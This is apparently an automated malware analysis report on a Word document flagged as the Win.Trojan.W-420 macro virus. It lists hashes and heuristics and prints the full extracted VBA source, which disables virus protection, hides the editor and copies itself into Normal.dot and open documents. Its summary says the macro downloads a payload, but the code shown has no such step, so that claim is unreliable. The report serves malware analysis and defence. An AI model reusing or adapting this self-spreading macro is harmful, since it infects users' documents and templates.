Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a255305c56409506…

MALICIOUS

Office (OLE)

32.0 KB Created: 2000-09-12 01:33:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 598528a97f22b5ff1b5a74202de0cfb4 SHA-1: 805b4204981f1ef4837af085540535c9b0f6d51a SHA-256: a255305c56409506026bf5ace8a6ec99edc772ea15ffb550d5b99fb8b55708c2
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Win.Trojan.W-420. It contains a VBA macro, specifically a Document_Open subroutine, which is designed to execute automatically when the document is opened. This macro attempts to disable security features and modify the document's code, indicating an intent to download and execute a secondary payload.

Heuristics 3

  • ClamAV: Win.Trojan.W-420 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W-420
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11984 bytes
SHA-256: ac840bf20d18d0a6231fa55fa4b14523a26d7b87d331ad4fcad953a6cdb35063
Detection
ClamAV: Win.Trojan.W-420
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FreeStyler"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
On Error Resume Next
'VOVAN//SMF
Application.EnableCancelKey = 0: Application.ShowVisualBasicEditor = 0
B = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
C = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
xxx = Mid(B, 13): fff = Len(xxx) - 2: hhh = Left(xxx, fff)
Number = MacroContainer.VBProject.VBComponents(1).CodeModule.ProcCountLines(hhh, vbext_pk_Proc)
VV = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Number)
With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, Number
.InsertLines C, VV
End With
End Sub
        Sub View()
        Document_New
        End Sub
Private Sub Document_Close()
On Error Resume Next
If ActiveDocument.Name = ActiveDocument.FullName Then Document_New: End
If ActiveDocument.Saved = True Then Call Document_Open Else End
End Sub
        Sub Macro()
        Document_New
        End Sub
Private Sub Document_Open()
On Error Resume Next
Application.EnableCancelKey = 0: Application.ShowVisualBasicEditor = 0
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
ActiveDocument.ReadOnlyRecommended = 0: Application.ScreenUpdating = 0
Document_New
If ActiveDocument.ReadOnly = 1 Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
If NormalTemplate.VBProject.VBComponents.Item(1).Name = "FreeStyler" Then DOT = True
If ActiveDocument.VBProject.VBComponents.Item(1).Name = "FreeStyler" Then DOC = True
If DOT = True And DOC = True Then GoTo 1
If DOT = False Then
Set Acti = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
m = Acti.ProcBodyLine("Macro", vbext_ProcKind)
Acti.replaceline m, "        Sub ToolsMacro()"
a = Acti.ProcBodyLine("View", vbext_ProcKind)
Acti.replaceline a, "        Sub ViewVBcode()"
VV = Acti.Lines(1, FreeStyler.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule: .DeleteLines 1, .CountOfLines: .AddFromString VV: End With
NormalTemplate.VBProject.VBComponents.Item(1).Name = "FreeStyler"
m = Acti.ProcBodyLine("ToolsMacro", vbext_ProcKind)
Acti.replaceline m, "        Sub Macro()"
a = Acti.ProcBodyLine("ViewVBcode", vbext_ProcKind)
Acti.replaceline a, "        Sub View()"
End If
If DOC = False Then
Set Norma = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
m = Norma.ProcBodyLine("ToolsMacro", vbext_ProcKind)
Norma.replaceline m, "        Sub Macro()"
a = Norma.ProcBodyLine("ViewVBcode", vbext_ProcKind)
Norma.replaceline a, "        Sub View()"
CC = FreeStyler.VBProject.VBComponents.Item(1).CodeModule.Lines(1, FreeStyler.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule: .DeleteLines 1, .CountOfLines: .AddFromString CC: End With
ActiveDocument.VBProject.VBComponents.Item(1).Name = "FreeStyler"
m = Norma.ProcBodyLine("Macro", vbext_ProcKind)
Norma.replaceline m, "        Sub ToolsMacro()"
a = Norma.ProcBodyLine("View", vbext_ProcKind)
Norma.replaceline a, "        Sub ViewVBcode()"
Document_New
End If
If ActiveDocument.FullName = wdOpenFormatDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
1: ActiveDocument.Saved = True
End Sub

' Processing file: /opt/analyzer/scan_staging/ee82591888e64c1bbaf4577d91b6ca5c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/FreeStyler - 5364 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_New())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	QuoteRem 0x0000 0x000A "VOVAN//SMF"
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt ShowVisualBasicEditor 
' Line #4:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitD
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.